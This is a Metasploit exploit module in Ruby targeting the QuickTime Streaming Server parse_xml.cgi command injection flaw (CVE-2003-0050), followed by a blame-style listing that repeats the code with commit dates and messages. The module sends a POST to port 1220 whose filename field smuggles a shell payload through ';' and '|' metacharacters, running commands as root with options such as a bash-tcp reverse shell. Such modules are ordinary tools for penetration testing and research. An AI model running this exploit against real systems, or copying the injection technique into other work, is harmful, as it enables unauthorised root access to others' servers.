modules/exploits/unix/webapp/qtss_parse_xml_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
      'Description'    => %q{
          The QuickTime Streaming Server contains a CGI script that is vulnerable
        to metacharacter injection, allow arbitrary commands to be executed as root.
        },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '10562'],
          [ 'BID', '6954' ],
          [ 'CVE', '2003-0050' ]
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 512,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl bash-tcp telnet',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 24 2003'
    ))

    register_options(
      [
        Opt::RPORT(1220)
      ])
  end

  def exploit

    print_status("Sending post request with embedded command...")

    data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")

    response = send_request_raw({
      'uri'	  => "/parse_xml.cgi",
      'method'  => 'POST',
      'data'    => data,
      'headers' =>
      {
        'Content-Type'	 => 'application/x-www-form-urlencoded',
        'Content-Length' => data.length,
      }
    }, 3)

    # If the upload worked, the server tries to redirect us to some info
    # about the file we just saved
    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end

    handler
  end
end
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = ExcellentRanking`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::Remote::HttpClient`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',`
			`'Description' => %q{`
			`The QuickTime Streaming Server contains a CGI script that is vulnerable`
			`to metacharacter injection, allow arbitrary commands to be executed as root.`
			`},`
			`'Author' => [ 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '10562'],`
Retab modules 2013-08-30 16:28:54 -05:00			`[ 'BID', '6954' ],`
			`[ 'CVE', '2003-0050' ]`
			`],`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Space' => 512,`
			`'Compat' =>`
			`{`
Fix #5659 : Update CMD exploits payload compatibility options 2015-08-10 17:12:59 -05:00			`'PayloadType' => 'cmd cmd_bash',`
			`'RequiredCmd' => 'generic perl bash-tcp telnet',`
Retab modules 2013-08-30 16:28:54 -05:00			`}`
			`},`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Feb 24 2003'`
			`))`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`register_options(`
			`[`
			`Opt::RPORT(1220)`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`def exploit`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`print_status("Sending post request with embedded command...")`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}\|")`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`response = send_request_raw({`
			`'uri' => "/parse_xml.cgi",`
			`'method' => 'POST',`
			`'data' => data,`
			`'headers' =>`
			`{`
			`'Content-Type' => 'application/x-www-form-urlencoded',`
			`'Content-Length' => data.length,`
			`}`
			`}, 3)`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`# If the upload worked, the server tries to redirect us to some info`
			`# about the file we just saved`
			`if response and response.code != 200`
			`print_error("Server returned non-200 status code (#{response.code})")`
			`end`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00
Retab modules 2013-08-30 16:28:54 -05:00			`handler`
			`end`
Adds coverage for the QTSS metachar injection bug 2009-12-09 13:23:59 +00:00			`end`